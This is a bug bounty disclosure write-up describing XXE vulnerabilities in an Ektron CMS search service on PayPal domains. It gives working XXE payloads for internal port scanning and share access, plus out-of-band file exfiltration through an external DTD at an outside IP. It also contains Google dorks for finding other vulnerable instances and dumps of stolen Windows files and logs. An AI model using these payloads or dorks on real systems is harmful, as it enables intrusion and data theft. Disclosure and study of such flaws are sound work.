Paypal

XXE
Sean Melia @seanmeals
https://www.linkedin.com/in/meliasean
https://www.hackerone.com/meals

Introduction

I was able to find three XML External Entity (XXE) attacks on PayPals externally
facing sites. The vulnerabilities are related to Ektron CMS which has been notorious
for vulnerabilities. Paypal was running an older version of Ektron which left the web
services exposed.

Heres the write up!

Exploit

Google Dork to find some PayPal services running Ektron:

inurl:robots.txt intext:Disallow: /workarea/ site:*.paypal.*

https://www.paypal.fr/WorkArea/webservices/SearchService.asmx?op=ExecuteSe
arch


Many of the web services require authentication, however the search functions do
not! Surprisingly these are the functions that are using a vulnerable XML parser!

By submitting the query parameter with a blank value I was presented with an error
referencing LoadXml, which in the past has been vulnerable to XXE.

I then submitted some XML to test if I could scan ports on their internal
servers/networks. I was able to!

Payload: query=<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [
<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://127.0.0.1:80"
>]><foo>&xxe;</foo>

Port 80 response shows there is a service listening:

Port 22 response shows there is no service listening:

Change the port number to whatever port you would like to scan or run it through
intruder and do an automated port scan. Compare the response sizes and content to
determine which ports have a service listening on them. Anything with a response
size different from 2453 shows that there is a service listening.



This can be used to enumerate services listening internally that may be vulnerable
to SQL injection or command execution via GET parameters in the URL. E.g.
http://10.10.10.67:9999/?id= waitfor delay00:00:10-- -


This attack can also connect to Windows Shares. An attacker can scan the internal
network and look for open shares containing sensitive documents.

Payload: query=<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE roottag [
<!ENTITY % file SYSTEM "\\localhost\Admin$"> <!ENTITY % dtd SYSTEM
"http://104.236.212.244/evil1.dtd"> %dtd;]><roottag>&send;</roottag>

I can also read local files off of the webserver using an out-of-band method by
hosting an external DTD.

Payload: query=<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE roottag [

<!ENTITY % file SYSTEM "file:///c:\windows\win.ini"> <!ENTITY % dtd SYSTEM
"http://104.236.212.244/evil1.dtd"> %dtd;]><roottag>&send;</roottag>

External .dtd file that I am referencing from my server:

The win.ini file outputted to my server logs:

URL Decoded output:
; for 16-bit app support

[fonts]

[extensions]

[mci extensions]

[files]

[Mail]

MAPI=1

Some various log files found on windows systems that I was able to pull as well:

C:\windows\security\logs\scecomp.old

03/05/2011 15:15:47
Succeed
Update
Key

MACHINE\System\CurrentControlSet\Services\Tcpip

Security=D:P(A;CI;KR;;;BU)(A;CI;KA;;;BA)(A;CI;KA;;;SY)(A;CI;CCLCSWRPRC;;;
NS)(A;CI;KR;;;LS)(A;CI;CCLCSWRPRC;;;NO)(A;CI;CCLCSWRPRC;;;S-1-5-802940520708-3855866260-481812779-327648279-1710889582)(A;CIIO;RC;;;OW)
03/05/2011 15:15:47
Succeed
Update
Key

MACHINE\System\CurrentControlSet\Services\Tcpip\ServiceProvider

Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GRLCSWCCRPR
C;;;NS)(A;CI;GR;;;LS)(A;CI;CCLCSWRPRC;;;NO)
03/05/2011 15:15:47
Succeed
Update
Key

MACHINE\SYSTEM\ControlSet001\services\Tcpip\ServiceProvider

Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GRLCSWCCRPR
C;;;NS)(A;CI;GR;;;LS)(A;CI;CCLCSWRPRC;;;NO)
03/05/2011 15:15:47
Succeed
Update
Key

MACHINE\SYSTEM\ControlSet001\services\Tcpip\ServiceProvider

Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GRLCSWCCRPR
C;;;NS)(A;CI;GR;;;LS)(A;CI;CCLCSWRPRC;;;NO)
03/05/2011 15:15:47
Succeed
Update
Key

MACHINE\SYSTEM\ControlSet001\services\Tcpip\ServiceProvider

Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GRLCSWCCRPR
C;;;NS)(A;CI;GR;;;LS)(A;CI;CCLCSWRPRC;;;NO)
03/05/2011 15:15:47
Succeed
Update
Key

MACHINE\SYSTEM\ControlSet001\services\Tcpip\ServiceProvider

Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GRLCSWCCRPR
C;;;NS)(A;CI;GR;;;LS)(A;CI;CCLCSWRPRC;;;NO)
03/05/2011 15:15:47
Succeed
Update
Key

MACHINE\SYSTEM\ControlSet001\services\Tcpip\ServiceProvider

Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GRLCSWCCRPR
C;;;NS)(A;CI;GR;;;LS)(A;CI;CCLCSWRPRC;;;NO)
03/05/2011 15:15:47
Succeed
Update
Key

MACHINE\SYSTEM\ControlSet001\services\Tcpip\ServiceProvider

Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GRLCSWCCRPR
C;;;NS)(A;CI;GR;;;LS)(A;CI;CCLCSWRPRC;;;NO)
03/05/2011 15:15:47
Succeed
Update
Key

MACHINE\SYSTEM\ControlSet001\services\Tcpip\ServiceProvider

Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GRLCSWCCRPR
C;;;NS)(A;CI;GR;;;LS)(A;CI;CCLCSWRPRC;;;NO)
03/05/2011 15:15:47
Succeed
Update
Key


MACHINE\System\CurrentControlSet\Control\Network

Security=D:PAI(A;CI;KR;;;BU)(A;CI;KA;;;BA)(A;CI;KA;;;SY)(A;CI;
KA;;;NS)(A;CI;KA;;;LS)(A;CI;CCDCLCSWRPSDRC;;;NO)(A;CI;CCDCLCSWRPWPSDRC;;;
S-1-5-80-2940520708-3855866260-481812779-3276482791710889582)(A;CIIO;RC;;;OW)(A;CI;KA;;;SU)(A;CI;KA;;;S-1-5-80-28986496042335086160-1904548223-3761738420-3855444835)(A;CIIO;RC;;;S-1-3-4)
03/05/2011 15:15:47
Succeed
Update
Key

MACHINE\SYSTEM\ControlSet001\services\Tcpip\Linkage

Security=D:PAI(A;CI;KR;;;BU)(A;CI;KA;;;BA)(A;CI;KA;;;SY)(A;CI;
KA;;;NS)(A;CI;KA;;;LS)(A;CI;CCDCLCSWRPSDRC;;;NO)(A;CI;CCDCLCSWRPWPSDRC;;;
S-1-5-80-2940520708-3855866260-481812779-3276482791710889582)(A;CIIO;RC;;;OW)(A;CI;KA;;;SU)(A;CI;KA;;;S-1-5-80-28986496042335086160-1904548223-3761738420-3855444835)(A;CIIO;RC;;;S-1-3-4)
03/05/2011 15:15:47
Succeed
Update
Key

MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters

Security=D:P(A;CI;KR;;;BU)(A;CI;KA;;;BA)(A;CI;KA;;;SY)(A;CI;CCDCLCSWRP
WPSDRC;;;NS)(A;CI;KR;;;LS)(A;CI;CCDCLCSWRPSDRC;;;NO)(A;CI;CCDCLCSWRPWPS
DRC;;;S-1-5-80-2940520708-3855866260-481812779-3276482791710889582)(A;CIIO;RC;;;OW)(A;CI;KRKW;;;S-1-5-80-3981856537-5817756231136376035-2066872258-409572886)
03/05/2011 15:15:47
Succeed
Update
Key

MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Adapters

Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)
03/05/2011 15:15:47
Succeed
Update
Key

MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Winsock

Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)
03/05/2011 15:15:47
Succeed
Update
Key

MACHINE\SYSTEM\ControlSet001\services\Dhcp\Parameters

Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GR;;;NS)(A;CI;G
RLCSWCCRPRC;;;S-1-5-80-2940520708-3855866260-481812779-3276482791710889582)(A;CI;GR;;;LS)(A;CI;GR;;;NO)
03/05/2011 15:15:47
Succeed
Update
Key

MACHINE\SYSTEM\ControlSet001\services\Dhcp\Parametersv6

Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GR;;;NS)(A;CI;G
RLCSWCCRPRC;;;S-1-5-80-2940520708-3855866260-481812779-3276482791710889582)(A;CI;GR;;;LS)(A;CI;GR;;;NO)
03/05/2011 15:15:47
Succeed
Update
Key

MACHINE\SYSTEM\ControlSet001\services\Dhcp\Configurations

Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GR;;;NS)(A;CI;G
A;;;S-1-5-80-2940520708-3855866260-481812779-3276482791710889582)(A;CI;GR;;;LS)(A;CI;GA;;;NO)
03/05/2011 15:15:47
Succeed
Update
Key

MACHINE\SYSTEM\ControlSet001\services\Dhcp\Parameters\Options

Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GR;;;NS)(A;CI;G
A;;;S-1-5-80-2940520708-3855866260-481812779-3276482791710889582)(A;CI;GR;;;LS)(A;CI;GA;;;NO)

03/05/2011 15:15:47
Succeed
Update
Key

MACHINE\SYSTEM\ControlSet001\services\Dhcp\Parametersv6\Options

Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GR;;;NS)(A;CI;G
A;;;S-1-5-80-2940520708-3855866260-481812779-3276482791710889582)(A;CI;GR;;;LS)(A;CI;GA;;;NO)


C:\windows\security\logs\scesrv.log
-------------------------------------------
Wednesday, June 11, 2014 1:54:02 AM
----Configuration engine was initialized successfully.----

----Reading Configuration Template info...


----Configure User Rights...


SeImpersonatePrivilege must be assigned to administrators. This
setting is adjusted.


SeImpersonatePrivilege must be assigned to SERVICE. This setting is
adjusted.

Configure S-1-5-19.

Configure S-1-5-20.

Configure S-1-5-21-3982848173-2833271265-4254726511-1004.

Configure S-1-5-80-3880006512-4290199581-1648723128-35698697373631323133.

Configure S-1-5-82-1078778675-3072034145-2029527255-5070158381043371142.

Configure S-1-5-82-145413143-1359051115-2505700303-4160712981291788329.

Configure S-1-5-82-2996991680-68878715-1649194708-14068111872978222158.

Configure S-1-5-82-4280230437-51877121-4113000123-33688648871387175710.

Configure S-1-5-82-606752505-1068012140-2233443849-24379493461804447525.

Configure S-1-5-32-544.

Configure S-1-5-32-551.

Configure S-1-5-32-559.

Configure S-1-5-32-568.

Configure S-1-1-0.

Configure S-1-5-32-545.

Configure S-1-5-6.

Configure S-1-5-21-3982848173-2833271265-4254726511-1008.

Configure S-1-5-32-555.

Configure S-1-5-80-0.


Configure S-1-5-80-3139157870-2983391045-3678747466-6587257121809340420.


User Rights configuration was completed successfully.


----Un-initialize configuration engine...

Conclusion

The impact of this XXE is that a persistent attacker can find the location of sensitive
files such as web.config and steal private information from PayPal. They can then
use this information and other information retrieved from other configuration files
to pivot to other services that PayPal uses to hold internal and customer data.

Additional Info

A number of domains vulnerable to this exploit are below:


Google Dorks to find other Ektron instances

1. inurl:/WorkArea/webservices/
2. inurl:robots.txt intext:Disallow: /workarea/

Resources

http://blog.h3xstream.com/2014/06/identifying-xml-external-entity.html
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing